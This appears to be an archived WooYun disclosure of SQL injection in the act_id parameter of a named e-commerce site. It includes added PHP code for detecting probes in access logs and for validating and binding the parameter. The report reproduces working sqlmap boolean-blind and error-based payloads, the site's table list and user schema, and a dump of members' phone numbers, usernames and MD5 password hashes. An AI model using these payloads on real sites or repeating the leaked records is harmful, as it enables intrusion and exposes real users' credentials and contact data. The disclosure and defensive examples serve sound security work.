WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --- http://drop.zone.ci/
2014-11-25: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-01-09: The vendor has actively ignored the vulnerability; details disclosed to the public.
SQL injection
Site: http://www.whjdsc.com/
Injection point: http://www.whjdsc.com/goods_sales.php?act_id=4
Injected parameter: act_id. The database can be dumped directly, leaking sensitive information about administrators and members.
GET parameter 'act_id' is vulnerable. Do you want to keep testing the others? [y/N] y
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
---
Place: GET
Parameter: act_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: act_id=4 AND 2021=2021

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: act_id=4 AND (SELECT 8873 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,115,107,58),(SELECT (CASE WHEN (8873=8873) THEN 1 ELSE 0 END)),CHAR(58,102,112,121,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
[12:14:01] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: PHP 5.2.6, Microsoft IIS 6.0
back-end DBMS: MySQL 5.0
[12:14:01] [INFO] fetching database names
[12:14:01] [INFO] the SQL query used returns 2 entries
[12:14:01] [INFO] retrieved: information_schema
[12:14:01] [INFO] retrieved: whjdsc
available databases [2]:
[*] information_schema
[*] whjdsc
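The sqlmap output above shows the two techniques that confirmed the injection: a boolean-based probe (an appended `AND n=n`) and an error-based probe that leans on `information_schema` and `FLOOR(RAND(0)*2)`. Both leave a recognisable trace in the web server's access log. The PHP script below is an added example, not part of the original report and not the site's code: it scans IIS 6.0 W3C access-log lines for id parameters that are not bare integers and labels the technique. The log lines, field layout, timestamps and IP addresses are constructed for illustration.

```php
<?php
// Added example (not from the original report): flag sqlmap-style probes
// against integer id parameters in IIS W3C access-log lines.
// Assumed field order (constructed for this example):
//   date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username
//   c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
$sampleLog = <<<'LOG'
2014-11-25 12:13:58 10.0.0.5 GET /goods_sales.php act_id=4 80 - 203.0.113.7 Mozilla/5.0 200 0 0
2014-11-25 12:14:00 10.0.0.5 GET /goods_sales.php act_id=4%20AND%202021=2021 80 - 203.0.113.7 sqlmap/1.0 200 0 0
2014-11-25 12:14:01 10.0.0.5 GET /goods_sales.php act_id=4%20AND%20(SELECT%208873%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,122,115,107,58),(SELECT%20(CASE%20WHEN%20(8873=8873)%20THEN%201%20ELSE%200%20END)),CHAR(58,102,112,121,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) 80 - 203.0.113.7 sqlmap/1.0 500 0 0
LOG;

// Signatures for the two techniques sqlmap reported against act_id.
$signatures = array(
    'boolean_blind' => '/\bAND\s+\d+\s*=\s*\d+/i',
    'error_based'   => '/FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)|information_schema|CONCAT\s*\(\s*CHAR\s*\(/i',
);

/**
 * Return one alert per query-string parameter whose value is not a bare
 * integer. Each alert carries the client IP, the parameter name, the
 * technique label (or 'non_integer_id' if no signature matched) and the
 * HTTP status the server returned.
 */
function detectProbes($log, $signatures)
{
    $alerts = array();
    foreach (explode("\n", trim($log)) as $line) {
        $f = preg_split('/\s+/', trim($line));
        if (count($f) < 11) {
            continue; // malformed or truncated line
        }
        $query    = urldecode($f[5]); // cs-uri-query, logged URL-encoded
        $clientIp = $f[8];            // c-ip
        parse_str($query, $params);   // splits each pair at its first '='
        foreach ($params as $name => $value) {
            if (preg_match('/^\d+$/', $value)) {
                continue; // a plain integer id is what the page expects
            }
            $technique = 'non_integer_id';
            foreach ($signatures as $label => $re) {
                if (preg_match($re, $value)) {
                    $technique = $label;
                    break;
                }
            }
            $alerts[] = array(
                'ip'        => $clientIp,
                'param'     => $name,
                'technique' => $technique,
                'status'    => $f[10],
            );
        }
    }
    return $alerts;
}

foreach (detectProbes($sampleLog, $signatures) as $a) {
    printf("%s param=%s technique=%s status=%s\n",
        $a['ip'], $a['param'], $a['technique'], $a['status']);
}
```

The first constructed line is a normal request and produces no alert; the second is labelled `boolean_blind` and the third `error_based`. Treating "id parameter is not an integer" as the primary trigger, with the signatures only as labels, keeps the rule from depending on sqlmap's exact payload wording.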
Clearly, whjdsc is the database of interest:
Database: whjdsc
[91 tables]
+-------------------------+
| ecs_account_log         |
| ecs_ad                  |
| ecs_ad_custom           |
| ecs_ad_position         |
| ecs_admin_action        |
| ecs_admin_log           |
| ecs_admin_message       |
| ecs_admin_user          |
| ecs_adsense             |
| ecs_affiliate_log       |
| ecs_agency              |
| ecs_area_region         |
| ecs_article             |
| ecs_article_cat         |
| ecs_attribute           |
| ecs_auction_log         |
| ecs_auto_manage         |
| ecs_back_goods          |
| ecs_back_order          |
| ecs_bonus_type          |
| ecs_booking_goods       |
| ecs_brand               |
| ecs_card                |
| ecs_cart                |
| ecs_cat_recommend       |
| ecs_category            |
| ecs_collect_goods       |
| ecs_comment             |
| ecs_crons               |
| ecs_delivery_goods      |
| ecs_delivery_order      |
| ecs_email_list          |
| ecs_email_sendlist      |
| ecs_error_log           |
| ecs_exchange_goods      |
| ecs_favourable_activity |
| ecs_feedback            |
| ecs_friend_link         |
| ecs_goods               |
| ecs_goods_activity      |
| ecs_goods_article       |
| ecs_goods_attr          |
| ecs_goods_cat           |
| ecs_goods_gallery       |
| ecs_goods_type          |
| ecs_goods_visiter       |
| ecs_group_goods         |
| ecs_keywords            |
| ecs_link_goods          |
| ecs_mail_templates      |
| ecs_member_price        |
| ecs_nav                 |
| ecs_order_action        |
| ecs_order_goods         |
| ecs_order_info          |
| ecs_pack                |
| ecs_package_goods       |
| ecs_pay_log             |
| ecs_payment             |
| ecs_plugins             |
| ecs_products            |
| ecs_reg_extend_info     |
| ecs_reg_fields          |
| ecs_region              |
| ecs_role                |
| ecs_searchengine        |
| ecs_sessions            |
| ecs_sessions_data       |
| ecs_shipping            |
| ecs_shipping_area       |
| ecs_shop_config         |
| ecs_snatch_log          |
| ecs_stats               |
| ecs_suppliers           |
| ecs_tag                 |
| ecs_template            |
| ecs_topic               |
| ecs_user_account        |
| ecs_user_address        |
| ecs_user_bonus          |
| ecs_user_feed           |
| ecs_user_rank           |
| ecs_users               |
| ecs_virtual_card        |
| ecs_volume_price        |
| ecs_vote                |
| ecs_vote_log            |
| ecs_vote_option         |
| ecs_wholesale           |
| ecs_zxcomment           |
| neworder                |
+-------------------------+
There are many tables here; the key ones are ecs_admin_user and ecs_users:
The administrator account and password are already exposed. Next, the ecs_users table:
Database: whjdsc
Table: ecs_users
[35 columns]
+-----------------+------------------------+
| Column          | Type                   |
+-----------------+------------------------+
| address_id      | mediumint(8) unsigned  |
| aite_id         | text                   |
| alias           | varchar(60)            |
| answer          | varchar(255)           |
| birthday        | date                   |
| credit_line     | decimal(10,2) unsigned |
| ec_salt         | varchar(10)            |
| email           | varchar(60)            |
| flag            | tinyint(3) unsigned    |
| frozen_money    | decimal(10,2)          |
| home_phone      | varchar(20)            |
| is_special      | tinyint(3) unsigned    |
| is_validated    | tinyint(3) unsigned    |
| last_ip         | varchar(15)            |
| last_login      | int(11) unsigned       |
| last_time       | datetime               |
| mobile_phone    | varchar(20)            |
| msn             | varchar(60)            |
| office_phone    | varchar(20)            |
| parent_id       | mediumint(9)           |
| passwd_answer   | varchar(255)           |
| passwd_question | varchar(50)            |
| password        | varchar(32)            |
| pay_points      | int(10) unsigned       |
| qq              | varchar(20)            |
| question        | varchar(255)           |
| rank_points     | int(10) unsigned       |
| reg_time        | int(10) unsigned       |
| salt            | varchar(10)            |
| sex             | tinyint(1) unsigned    |
| user_id         | mediumint(8) unsigned  |
| user_money      | decimal(10,2)          |
| user_name       | varchar(60)            |
| user_rank       | tinyint(3) unsigned    |
| visit_count     | smallint(5) unsigned   |
+-----------------+------------------------+
The full user details are all here. A partial listing:
[12:52:18] [INFO] fetching columns 'user_name, password, user_id, mobile_phone' entries for table 'ecs_users' on database 'whjdsc'
[12:52:18] [INFO] the SQL query used returns 145 entries
[12:52:18] [INFO] retrieved: 12345678912
[12:52:19] [INFO] retrieved: 554fcae493e564ee0dc75bdf2ebf94ca
[12:52:19] [INFO] retrieved: 1
[12:52:19] [INFO] retrieved: 125882949
[12:52:19] [INFO] retrieved: 232059cb5361a9336ccf1b8c2ba7657a
[12:52:19] [INFO] retrieved: 2
[12:52:19] [INFO] retrieved: 13329749788
[12:52:20] [INFO] retrieved: 1cb251ec0d568de6a929b520c4aed8d1
[12:52:20] [INFO] retrieved: 3
[12:52:20] [INFO] retrieved: 13554090008
[12:52:20] [INFO] retrieved: 815a71fb334412e7ba4595741c5a111d
[12:52:20] [INFO] retrieved: 5
[12:52:28] [INFO] retrieved: 13971362808
[12:52:28] [INFO] retrieved: eac4108912af90ae96e858190f4d8af7
[12:52:29] [INFO] retrieved: 6
[12:52:29] [INFO] retrieved: 750155706
[12:52:29] [INFO] retrieved: 13995669913
[12:52:29] [INFO] retrieved: 6e3c4c536c79a52bfcdd9328048ca75e
[12:52:29] [INFO] retrieved: 7
[12:52:29] [INFO] retrieved: 18672192586
[12:52:29] [INFO] retrieved: 96e79218965eb72c92a549dd5a330112
[12:52:30] [INFO] retrieved: 8
[12:52:30] [INFO] retrieved: 18955163067
[12:52:30] [INFO] retrieved: a684224d67907e32a7ba70ebfa67efce
[12:52:30] [INFO] retrieved: 9
[12:52:30] [INFO] retrieved: 18998752158
[12:52:31] [INFO] retrieved: 5eee5eead6fd883106ffd6e9d1f0f65a
[12:52:31] [INFO] retrieved: 10
[12:52:31] [INFO] retrieved: 56658585
[12:52:31] [INFO] retrieved: e10adc3949ba59abbe56e057f20f883e
[12:52:31] [INFO] retrieved: 11
[12:52:32] [INFO] retrieved: 5800
[12:52:32] [INFO] retrieved: 305a02ad3d398666e32ca6d194b1370a
[12:52:32] [INFO] retrieved: 12
[12:52:32] [INFO] retrieved: admin1
[12:52:32] [INFO] retrieved: 62bb11f0245ecb7ae19e0fe1f3cbf4bc
[12:52:32] [INFO] retrieved: 13
[12:52:33] [INFO] retrieved: admin2
[12:52:33] [INFO] retrieved: 3e7276336d9f5ac19eb71d125048e3d4
[12:52:33] [INFO] retrieved: 14
[12:52:33] [INFO] retrieved: AdomaGaffef
[12:52:33] [INFO] retrieved: d1c92a24639ae1d523cfa62e71c6dd2e
[12:52:33] [INFO] retrieved: 15
[12:52:34] [INFO] retrieved: ageless
[12:52:34] [INFO] retrieved: 2b9358635e18f1f66b222111ee1240d1
This is enough to demonstrate the impact; testing stops here.
Apply strict filtering to the act_id parameter.
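The remediation above is one line; this added PHP example (not ECShop's own code and not the site's goods_sales.php, whose source the report does not show) spells out what "strict filtering" of act_id means in practice: reject anything that is not a positive integer before any SQL is built, and bind the value through a mysqli prepared statement rather than concatenating it. The table and column names, the 400 response and the helper names are assumptions made for illustration.

```php
<?php
// Added example (not the site's actual goods_sales.php): validating and
// binding an integer id parameter. Table/column names are assumed.

// Vulnerable pattern: request data concatenated straight into SQL, so a
// value such as "4 AND 2021=2021" changes the query instead of the id.
function buildQueryUnsafe($actId)
{
    return "SELECT goods_id, goods_name FROM ecs_goods_activity WHERE act_id = " . $actId;
}

// Hardened step 1: accept only a positive integer, otherwise return null.
function validateActId($raw)
{
    $id = filter_var($raw, FILTER_VALIDATE_INT,
        array('options' => array('min_range' => 1)));
    return ($id === false) ? null : $id;
}

// Hardened step 2: bind the validated integer as a parameter, so the
// database never sees user input as part of the SQL text.
function fetchActivity(mysqli $db, $raw)
{
    $actId = validateActId($raw);
    if ($actId === null) {
        header('HTTP/1.1 400 Bad Request');
        return array();
    }
    $stmt = $db->prepare(
        'SELECT goods_id, goods_name FROM ecs_goods_activity WHERE act_id = ?');
    $stmt->bind_param('i', $actId);
    $stmt->execute();
    $stmt->bind_result($goodsId, $goodsName);
    $rows = array();
    while ($stmt->fetch()) {
        $rows[] = array('goods_id' => $goodsId, 'goods_name' => $goodsName);
    }
    $stmt->close();
    return $rows;
}

// Self-check without a database: the legitimate value passes, the
// boolean-blind payload from the report is rejected before any SQL exists.
if (validateActId('4') !== 4) {
    throw new RuntimeException('a plain integer id must be accepted');
}
if (validateActId('4 AND 2021=2021') !== null) {
    throw new RuntimeException('an injected id must be rejected');
}
echo "validation checks passed\n";
```

Validation alone would already have stopped the probes shown in this report, but the prepared statement is what removes the bug class: if a later change passes a string parameter through the same path, binding still keeps it out of the SQL grammar.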
Could not reach the vendor, or the vendor actively declined.